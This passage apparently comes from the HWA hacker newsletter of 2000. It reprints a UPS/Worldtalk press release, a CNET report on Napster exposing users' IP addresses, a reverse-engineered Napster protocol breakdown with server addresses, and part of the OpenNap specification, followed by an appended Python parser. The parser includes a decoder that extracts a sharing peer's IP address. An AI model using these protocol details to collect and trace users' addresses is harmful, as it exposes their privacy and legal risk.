The electronics maker aims to develop software utilising the new technology as soon as possible, he said, although he gave no specific time frame.

Worries about Internet hackers were heightened in Japan this week after humiliating raids on government Web sites, in which hackers linked one to a pornographic site and attacked the nation's war record on another.

@HWA

60.0 HNN: Jan 26: UPS announces Worldtalk secure email.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Evil Wench

From HNN http://www.hackernews.com/

UPS has announced the launch of Worldtalk, a product aimed at securing corporate e-mail while in transit. It also claims to block SPAM and Viruses. UPS is offering companies up to $100,000 for business losses as part of its customer assurance plan when using UPS Document Exchange.

(There is so much hype and marketing fluff in this press release it is hard to pick out the facts. On the surface this looks like nothing more than a glorified SSL package.)

United Parcel Service
http://www.ups.com/bin/shownews.cgi?20000124badnews

Bad News for Hackers, Crackers

Worldtalk, UPS Combine Powerful Security Solutions to Safeguard Critical Information

SANTA CLARA, Calif. and ATLANTA, Ga., Jan. 24, 2000 -- Worldtalk and UPS today announced the launch of a cutting edge security product combining industry-leading solutions to protect critical business information on a company's Web site or in transit via e-mail. The new product, WorldSecure/Mail for UPS OnLine Courier, integrates Worldtalk's award-winning WorldSecure products with UPS Document Exchange for a lethal one-two punch against hackers or crackers looking to gain access to confidential information on the Web.

Worldtalk's award-winning WorldSecure products, based on the WorldSecure policy management platform, enable organizations to define and enforce content security policies for e-mail and the Web. Worldtalk's products provide organizations with the ability to reduce corporate liability, secure intellectual property, guarantee confidentiality of communications with trading partners and protect network resources. WorldSecure/Mail ensures the confidentiality and privacy of Internet communication, protects information assets, and blocks viruses and SPAMs.

UPS Document Exchange guards sensitive information in transit between one organization's server and another's. Armed with 128-bit encryption on the server and optional password protection, UPS Document Exchange offers secure, trackable electronic delivery of anything that can be contained in a digital file, including documents, images and software, along with definitive proof of delivery.

Combined, the two products allow an organization to establish criteria by which specific types of sensitive documents or information can leave its network only via UPS Document Exchange - and are automatically converted into a secure UPS Document Exchange digital package before sending. Meanwhile other, less sensitive information can still be sent by conventional e-mail. Both companies will sell the integrated solution.
As an added security measure, UPS is putting its money where its mouth is by offering companies up to $100,000 for business losses as part of its customer assurance plan when using UPS Document Exchange.

Solutions that protect the security of sensitive documents become even more important as businesses communicate more frequently over the Internet. By the year 2001, 35 percent of business documents - 21 million per day - will move via the Internet, according to the Aberdeen Group.

"With the combination of WorldSecure and UPS Document Exchange, organizations can ensure their sensitive documents won't be floating around unprotected in the wildly unsecure world of e-mail," said Kim Marchner, Group Manager for UPS Document Exchange Marketing. "An organization has the power to define which types of documents - like prospectuses or confidential reports from its legal department - will be required to carry the protection of Document Exchange when leaving the server."

An important feature of UPS Document Exchange is its ease of use by both sender and receiver. Unlike unwieldy encryption programs that require the sender and recipient to have the same type of encryption software, Document Exchange requires only that the sender have a standard e-mail package, and the receiver have a standard Web browser.

"Organizations want to leverage the economy, efficiency and ubiquity of Internet e-mail," said Jim Heisch, President and CFO, Worldtalk. "Solutions like WorldSecure/Mail and UPS Document Exchange allow them to simply and efficiently define and enforce policies that ensure the safe use of their e-mail systems."

UPS Document Exchange, launched in June 1998, is a secure Internet communications service for business-to-business commerce based on Tumbleweed Communication Corp.'s Integrated Messaging Exchange (IME) technology.
Tumbleweed Integrated Messaging Exchange (IME) is a set of products and services that leverage the Internet and existing e-mail to create a secure, trackable online communications channel. Thousands of businesses are currently using UPS Document Exchange to securely move critical documents, images and software over the 'Net.

About Worldtalk

Worldtalk Corporation is a leading provider of policy enforcement solutions for e-mail and Web communications. The company's WorldSecure policy management platform complements existing firewalls by enabling organizations to enforce usage policies for all Internet e-mail and Web communications. Worldtalk delivered the industry's first integrated solution for managing and enforcing e-mail security policies in September 1997. Since then, organizations have purchased WorldSecure solutions to ensure confidentiality of their external e-mail communications, protect their intellectual property, prevent SPAMs and viruses, and reduce the legal liabilities associated with Internet communications. Worldtalk products include WorldSecure/Web and the award-winning WorldSecure/Mail (previously known as WorldSecure Server), which are marketed and sold worldwide by Worldtalk, Value Added Resellers (VARs) and distributors. For more information, please visit us at http://www.worldtalk.com.

About UPS

United Parcel Service, the world's largest express carrier and package delivery company, is a leading commerce facilitator, offering an unmatched array of traditional and electronic commerce services. By offering fully integrated, web-enabled business-to-business solutions and working with other e-commerce leaders, UPS is changing the way people do business. The company has won numerous awards for its Web site and information technology infrastructure, including two Computerworld Smithsonian Awards. The Atlanta-based company operates in more than 200 countries and employs more than 330,000 people worldwide.
UPS reported 1998 annual revenues of $24.8 billion. You can visit the UPS web site at www.ups.com.

For more information, contact:

Angela McMahon - UPS - 404-828-6840 amcmahon@ups.com
Shannon Hakesley - Worldtalk - 408-567-5141 shannon.hakesley@worldtalk.com

@HWA

61.0 HNN: Jan 27: Napster Reveals Users Info
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This seems like a very convenient and timely accident, I wonder if it wasn't engineered or leaked. This is the reason I didn't register with napster and haven't used it. Trust no one. - Ed

From HNN http://www.hackernews.com/

contributed by acopalyse

The popular MP3 trading software, Napster, may have a security hole. Internet security consultant Richard Smith, has found that Napster logs users' IP numbers. This information could be used to help copyright owners identify and try to prosecute Napster users who may be illegally trading music files.

C|Net
http://news.cnet.com/news/0-1005-200-1532962.html?tag=st.ne.1002.bgif?st.ne.fd.gif.j

(BTW this link looks wacked out but it is legit - Ed)

Security problem discovered in Napster music software

By Paul Festa
Staff Writer, CNET News.com
January 26, 2000, 3:30 p.m. PT

Those who use Napster's popular software for trading digital music files may not be as anonymous as they think they are.

Napster's program, which lets users see which digital music files other users possess, also exposes their Internet Protocol addresses, according to Internet security consultant Richard Smith. IP addresses are unique strings of numbers that identify users' computers on the Internet. That could help copyright owners identify and try to prosecute Napster users who may be illegally swapping music.

"Napster has a problem," he said. "It's serious in the sense that they have exposed their users to legal risk."
Napster acknowledged the problem but minimized its importance, saying that IP addresses are not easily procurable except by experienced network experts or hackers, and that individual IP addresses are more often than not obscured behind corporate or Internet service provider firewalls and proxy servers.

"With our product, when you transfer from point to point, the IP address is available to you," said Eddie Kessler, Napster's vice president of engineering. "It's something that a hacker might have access to. In most cases, tracing an individual user would not be possible, but it is possible."

Smith noted that IP addresses are traceable to individuals about a third of the time.

Napster said it is working on hiding its users' IP addresses.

"We're evaluating various technologies that would provide an even higher level of security to our users," Kessler said. "Specifically, they would not make your IP address visible to the person who was downloading content to you."

Kessler would not say when the company expects to implement those changes.

The trend in digital music copyright enforcement has been to target companies and larger institutions like universities rather than individuals. Napster itself is the target of a lawsuit by the Recording Industry Association of America (RIAA), which accused the company of "facilitating piracy" through its forum for letting online users trade unauthorized music files directly from their PCs. Another company under legal fire from the RIAA is music Web site MP3.com.

Smith said he discovered the Napster security flaw after examining the documentation posted to the Web this week by Stanford University senior David Weekly. Weekly's post irked Napster, which asked him to pull the page. Weekly declined and encouraged the page's dissemination. Today Kessler said the matter with Weekly will rest there.
"We're not going to play the DVD DeCSS game and try to shut it down," Kessler said, referring to the recent controversy over a piece of software called DeCSS that lets users circumvent copyright controls on DVDs. The Motion Picture Association of America has gone after sites to force them to take down copies of the tool.

(Let's face it, if the fedz want to shut you down, you're toast; they just don't put this on a priority level high enough to assign their limited manpower to. There are bigger fish to fry, hackers aren't the only users of sniffers and anyone can arp -a / netstat -a to see active connections...)

@HWA

Following up on this, here's Weekly's site URL http://david.weekly.org/ and here's the Napster breakdown (other info available on his site).

I was asked to take this article down, but I politely declined. Since then, I've been informed that things will not escalate. For some strange reason, this writeup got mentioned on slashdot and news.com, although why beats the heck out of me.

Yet To Discover

  - How account setup is managed
  - Administrative commands
  - More details about sending/receiving files
  - When "User Error" or such messages are sent

january 26, 2000   corrected a few tidbits
january 23, 2000   initial document release

Network Configuration

Napster appears to have cubes at globalcenter and at AboveNet.

  Their main router at abovenet is 208.184.213.7
  redirect servers: (server.napster.com:8875)
    208.184.216.222
    208.184.216.223
  servers:
    208.178.163.61 (globalcenter)
    208.178.175.130-4 (globalcenter)
    208.184.216.202,204-209,211-215,217-221 (abovenet @ sjc2:colo8)
    208.49.239.242,7,8 (globalcenter)
  ports: 4444,5555,6666,7777,8888

Interesting. Looks like their general strategy is to cluster in units of 5 IP block (corresponding to grouped rackmounts?) with 5 sets of port numbers for process redundancy on the servers. I bet they started with GlobalCenter, but decided to move in with Abovenet at their SJC2 colocation facility, now that they have their stuff together. That's where the organized clusters are. The Globalcenter unit looks like it's not in California, but connected via an OC48 line to Globalcenter's Herndon, VA node. (Thanks to Ben Byer!)

Protocol Breakdown

Initial Connection

  DNS lookup server.napster.com
  SYN (connect) -> 208.184.216.222 [connects port 8875 on server to 1876 locally]
  RECEIVED 80 bytes of data: "208.49.239.247:5555" (zero-padded)
  RECEIVED 6 0-bytes (Keepalive/synch)
  RESPONDS with 2 0-size packets (ACK)
  SYN (connect) -> 208.49.239.247 [connects port 5555 (surprise) to port 1877 locally]
  SENT to server: 28 00 02 00 username password 23 "v2.0 BETA 5" 10 4398560
  RECEIVED 6 0-bytes
  RECEIVED 10 00 00 00 "Invalid Password"
  RECEIVED 6 0-bytes
  connects again to main server, who suggests 208.178.175.133:8888 this time (fails)
  connects again to main server, who suggests 208.184.216.204 (succeeds)
  RECEIVES 00 00 10 00 03 00 anon@napster.com
  SENT 0A 00 0D 00 nuprin1715
  RECEIVED 0E 00 D6 00 "979 147566 587"

Request for Chat List

  SENT 00 00 69 02 (CHATLIST REQ)
  RECEIVED 26 00 6A 02 "Lobby 33 Welcome to the Lobby channel" 2E
           22 00 6A 02 "Rap 27 Welcome to the Rap channel" 2E
           23 00 6A 02 "Game 0 Welcome to the Game channel" 2E
           24 00 6A 02 "Rock 14 Welcome to the Rock channel" 2E
           35 00 6A 02 "International 1 Welcome to the International channel" 2E
           ...
           35 00 6A 02 "RadioVersions 0 Welcome to the RadioVersions Channel" 2E
           00 00 69 02 (CHATLIST REQ)

Joining a Channel

  SENT 06 00 90 01 "Trance" (JOIN REQUEST)
  RECEIVED 00 00 00 00 00 00 (SYNC)
           06 00 95 01 "Trance" (JOIN GRANTED)
           1B (string size) 00 98 01 "Trance username #songs conn#" (USER LISTING)
           ...
           06 00 99 01 "Trance" (CHANNEL NAME)
           25 00 9A 01 "Trance Welcome to the Trance channel" 2E (CHANNEL DESC)

  connection types:
    10 = T3 (or greater)
     9 = T1
     8 = DSL
     7 = Cable modem
     6 = 128k ISDN
     5 = 64k ISDN
     4 = 56k Modem
     3 = 33.6 Modem
     2 = 28.8 Modem
     1 = 14.4 Modem
     0 = Unknown

Talking on a Channel

  SENT 0C 00 92 01 Trance hello (size 00 92 01 channel message)
  RECEIVED 12 00 93 01 Trance myusername hello (size 00 93 01 channel user message)

Private Messages

  SENT 0B 00 CD 00 myusername hello (size 00 cd 00 touser message)
  RECEIVED 0B 00 CD 00 myusername hello (size 00 cd 00 fromuser message)

Whois Requests

  SENT 05 00 5B 02 username
  RECEIVED 3D 00 5C 02 username "User" 6025 "Trance " "Active" 127 0 0 10 "v2.0 BETA 5"

Leaving a Chat Room

  SENT 06 00 91 01 Trance
  RECEIVED [6-byte ack]

Searching for Songs

  SENT 41 00 C8 00 FILENAME CONTAINS "aaaa" MAX_RESULTS 123 LINESPEED "AT BEST" 8 BITRATE "AT LEAST" "128" FREQ "EQUAL TO" "32000"
  RECEIVED 00 00 CA 00 00 00 (NO RESULT)

  RECEIVED (on different query)
           81 00 C9 00 "c:\WINDOWS\DESKTOP\mp3s\Nirvana-Lithium.mp3" (32-byte checksum) (size in bytes) (bitrate in kbps) (freq) (duration in seconds) (username) (magic cookie - "643813570") (line speed)
           92 00 C9 00 "G:\Program Files\napster\Music\NIRVANA - Smells Like Teen Spirit.mp3" (32-byte checksum) ...
           00 00 CA 00 00 00

  [GASP!] Napster SENT the COMPLETE location of the file!!!! Does this mean that there is a way to coax the client to offer up ANY file?

  NOTE: ping time requirements not SENT to server (duh).

Hotlisting a User

  SENT 0E 00 CF 00 username
  RECEIVED 0E 00 2D 01 username (user is online)
           10 00 D1 00 username (user added to hotlist)

Listing a User's Files

  SENT 0E 00 D3 00 username
  RECEIVED 85 00 D4 00 username "D:\Nyhemladdade mp3 or\POWER-BEAT - Dance Club Megamixes.mp3" (32-byte checksum) (size in bytes) (kbps) (freq) (length in seconds)
           ...
           (size) 00 D5 00 (username) (= END OF RESULTS)

Requesting a File

  SENT 2A 00 CB 00 username "C:\MP3\REM - Everybody Hurts.mp3"
  RECEIVED 5D 00 CC 00 username 2965119704 (IP-address backward-form = A.B.C.D) 6699 (port) "C:\MP3\REM - Everybody Hurts.mp3" (song) (32-byte checksum) (line speed)
  [connect to A.B.C.D:6699]
  RECEIVED from client 31 00 00 00 00 00
  SENT to client GET
  RECEIVED from client 00 00 00 00 00 00
  SENT to client Myusername "C:\MP3\REM - Everybody Hurts.mp3" 0 (port to connect to)
  RECEIVED from client (size in bytes)
  SENT to server 00 00 DD 00 (give the go-ahead thru server)
  RECEIVED from client [DATA]

Sending a File

  [no information yet]

General Packet Format

  [chunksize] [chunkinfo] [data...]

  CHUNKSIZE: Intel-endian 16-bit integer size of [data...] in bytes
  CHUNKINFO: (hex) Intel-endian 16-bit integer. first byte:

    00 - login rejected
    02 - login requested
    03 - login accepted
    0D - challenge? (nuprin1715)
    2D - added to hotlist
    2E - browse error (user isn't online!)
    2F - remove user from hotlist OR user is offline
    5B - whois query
    5C - whois result
    5D - whois: user is offline!
    69 - list all channels
    6A - channel info
    90 - join channel
    91 - leave channel
    92 - send text to channel
    93 - receive text from channel
    94 - user error
    95 - join request granted
    96 - user has joined channel
    97 - user has left channel
    98 - username entry for list
    99 - channel name announcement
    9A - channel description
    C8 - send search query
    C9 - query result
    CA - end of query results
    CB - request file
    CC - download reply
    CD - send/receive private message
    CE - download error (they hung up!)
    CF - add user to hotlist
    D1 - user is online (on hotlist)
    D3 - query user's file listings
    D4 - listing entry
    D5 - end of entries
    D6 - update from server (SONGS USERS GIGABYTES)
    DA - begin transmission?
    DD - starting to transmit?
    F4 - Give push goahead (when connect port is 0)

When you're requesting a file from another client, and they ask you to connect to port ZERO, they don't want you to pull the file from them; they want to push the file to you directly. If you receive this, send a 0-length F4 (Give Push Goahead) to the Napster server, and the other client will connect to you.

(More tech info in next article - Ed)

@HWA

62.0 Dissecting the Napster system
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

More info following up from previous article

Source: http://opennap.sourceforge.net/napster.txt

napster messages
================

by drscholl@users.sourceforge.net
February 1, 2000

0. Forward

This is meant to be an open specification. If you find errors or know of additional functionality not described hereafter, please send me email. It benefits the entire community to have a complete and accurate protocol specification. Not only does it allow for clients to be developed for any platform, but also decreases the strain on the server having to parse out bad client messages.

Disclaimer: the following information was gathered by analyzing the protocol between the linux nap client and may not resemble the official windows client protocol.

1. Client-Server protocol

each message to/from the server is in the form of

    <length><type><data>

where <length> and <type> are 2 bytes each. <length> specifies the length in bytes of the <data> portion of the message.

Be aware that <length> and <type> appear to be in little-endian format (least significant byte goes first). For example, in the C language you would encode the number 1 as

    const unsigned char num[2] = { 0x01, 0x00 };

and 256 would be encoded as

    const unsigned char num[2] = { 0x00, 0x01 };

[The above is for illustrative purposes only, there are much quicker ways to actually encode a number. -ed]

Note that in many cases, strings are passed as double-quoted entries.
For example, filenames and client id strings are always sent as

    "random band - generic cowboy song.mp3"

or

    "nap v0.8"

Where required, double quotes are used in the description of the messages below.

Some additional information about use of quotes inside of quotes:

> The answer is, no, it doesn't do escaping of quotes. If you try searching
> for the phrase 'a "quoted" string' on the windows client, you get no songs
> found, and "invalid search request" printed in yellow in your console
> window. (don't know what code that is, sorry.)
>
> and no wonder-- a little birdie told me that the client sends this:
>
> FILENAME CONTAINS "a "quoted" string" MAX_RESULTS 100

[contributed by Ben Byer. -ed]

Note that unlike the IRC protocol, each line does NOT end in \r\n. The <length> field specifies exactly how much data you should read.

2. Message Types

The following section describes the format of the <data> section for each specific message type. Each field is denoted with <>. The fields in a message are separated by a single space character (ASCII 32). Where appropriate, examples of the <data> section for each message are given.

<type> can be one of the following (converted to big-endian):

0    error message [SERVER]

2    client login message [CLIENT]

     <nick> <password> <port> "<client-info>" <link-type>

     <port> is the port the client is listening on for data transfer. if this value is 0, it means that the client is behind a firewall and can only push files outward. it is expected that requests for downloads be made using the 500 message (see below)
     <client-info> is a string containing the client version info
     <link-type> is an integer indicating the client's bandwidth
         0   unknown
         1   14.4 kbps
         2   28.8 kbps
         3   33.6 kbps
         4   56.7 kbps
         5   64K ISDN
         6   128K ISDN
         7   Cable
         8   DSL
         9   T1
         10  T3 or greater

     Example:
     foo badpass 6699 "nap v0.8" 3

3    login ack [SERVER]

     <email>

     the server sends this message to the client after a successful login (2). If the nick is registered, the address given at registration time is returned. If the nick is not registered, a dummy value is returned.

4    ??? [CLIENT]

     the latest napster v2.0beta5a sends this prior to login.

6    alternate login format [CLIENT]

     this message is used when logging in for the first time after registering (0x07) a nick

     <nick> <password> <port> "<client-info>" <link-type> <email>

     note: this message is similar to the 0x02 message, with the addition of <email> on the end

     Example:
     foo foo 6699 "nap v0.8" 3 email@here.com

7    client registration message [CLIENT]

     this message is sent to create an account. response to this message is one of 8, 9 or 10

8    registration success [SERVER]

     the server sends this when the client's request to register a new nickname has succeeded.

9    nickname already registered [SERVER]

     the server sends this message when the nickname the client has requested has already been registered by another user

10   invalid nickname [SERVER]

     this server sends this message when the client attempts to register an invalid nickname [what defines an invalid nickname? -ed]

11   ??? [CLIENT]

     [returns "parameters are unparsable" -ed]

14   login options [CLIENT]

     NAME:%s ADDRESS:%s CITY:%s STATE:%s PHONE:%s AGE:%s INCOME:%s EDUCATION:%s

100  client notification of shared file [CLIENT]

     ""
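The framing that both Weekly's breakdown and the napster.txt spec above describe, as an added example (not code from either writeup or from opennap): a frame encoder and stream parser for the 16-bit little-endian length/type header, a tokenizer that rejects unescaped quotes the way the spec's search example fails, a login message builder, and a decoder for the download reply's "backward-form" IP, which is the message that hands a downloader the sharing peer's address. The type numbers come from the page (0x02, 0xCC, and 500 = 0x1F4, which is Weekly's F4 with high byte 01); all function names and the sample login and download-reply data are constructed for this example.

```python
import struct

# Type numbers from the page: Weekly lists the low byte in hex, napster.txt
# uses decimal, so 0x02 == 2 (login), 0xCC == 204 (download reply) and the
# "500 message" for push requests is 0x1F4 (Weekly's F4 with high byte 01).
MSG_ERROR = 0x00            # error message [SERVER]
MSG_LOGIN = 0x02            # client login message [CLIENT]
MSG_DOWNLOAD_REPLY = 0xCC   # download reply: nick, IP, port, "file", checksum, speed
MSG_PUSH_GOAHEAD = 0x1F4    # give push go-ahead when the peer's port is 0

LINK_TYPES = {0: "unknown", 1: "14.4 kbps", 2: "28.8 kbps", 3: "33.6 kbps",
              4: "56.7 kbps", 5: "64K ISDN", 6: "128K ISDN", 7: "Cable",
              8: "DSL", 9: "T1", 10: "T3 or greater"}


def encode_frame(msg_type: int, data: bytes = b"") -> bytes:
    """One frame: 16-bit LE length of <data>, 16-bit LE type, then <data>."""
    if len(data) > 0xFFFF:
        raise ValueError("data does not fit the 16-bit length field")
    return struct.pack("<HH", len(data), msg_type) + data


def parse_frames(buf: bytes):
    """Split a byte stream into (type, data) pairs.

    There is no line terminator: <length> says exactly how much to read, so
    a trailing partial frame is returned as leftover for the next read.
    """
    frames, pos = [], 0
    while len(buf) - pos >= 4:
        length, msg_type = struct.unpack_from("<HH", buf, pos)
        if len(buf) - pos - 4 < length:
            break                               # body not fully received yet
        frames.append((msg_type, buf[pos + 4:pos + 4 + length]))
        pos += 4 + length
    return frames, buf[pos:]


def tokenize(data: bytes) -> list:
    """Split <data> on single spaces, keeping "..." runs as one token.

    Quotes cannot be escaped, so a quoted token must end at a quote that is
    followed by a space or the end of data; anything else is rejected, which
    is what the napster.txt note reports for 'a "quoted" string'.
    """
    text = data.decode("latin-1")
    tokens, i, n = [], 0, len(text)
    while i < n:
        if text[i] == '"':
            end = text.find('"', i + 1)
            if end < 0 or (end + 1 < n and text[end + 1] != " "):
                raise ValueError("unparsable quoted token")
            tokens.append(text[i + 1:end])
            i = end + 2
        else:
            end = text.find(" ", i)
            end = n if end < 0 else end
            tokens.append(text[i:end])
            i = end + 1
    return tokens


def is_parsable(data: bytes) -> bool:
    """True if tokenize() accepts the <data> section."""
    try:
        tokenize(data)
        return True
    except ValueError:
        return False


def build_login(nick: str, password: str, port: int, client_info: str,
                link_type: int) -> bytes:
    """Frame a type-2 login: <nick> <password> <port> "<client-info>" <link-type>."""
    data = f'{nick} {password} {port} "{client_info}" {link_type}'
    return encode_frame(MSG_LOGIN, data.encode("latin-1"))


def parse_login(data: bytes) -> dict:
    nick, password, port, client_info, link_type = tokenize(data)
    return {"nick": nick, "password": password, "port": int(port),
            "client_info": client_info, "link_type": int(link_type),
            "link_name": LINK_TYPES.get(int(link_type), "unknown"),
            "behind_firewall": int(port) == 0}   # port 0: can only push


def ip_from_backward_int(value: int) -> str:
    """Decode the "backward-form" IP: the 32-bit value is little-endian,
    so its lowest byte is the first octet A of A.B.C.D."""
    return ".".join(str((value >> shift) & 0xFF) for shift in (0, 8, 16, 24))


def parse_download_reply(data: bytes) -> dict:
    """Fields as traced: nick, IP (backward int), port, "file", checksum, speed.

    This is the server message that gives the downloader the sharing
    peer's IP address, the exposure discussed in the article above.
    """
    nick, ip, port, filename, checksum, speed = tokenize(data)
    return {"nick": nick, "ip": ip_from_backward_int(int(ip)),
            "port": int(port), "filename": filename, "checksum": checksum,
            "link_name": LINK_TYPES.get(int(speed), "unknown"),
            # port 0: the peer is firewalled; send an empty 0x1F4 frame to
            # the server and let the peer connect to us instead
            "needs_push": int(port) == 0}
```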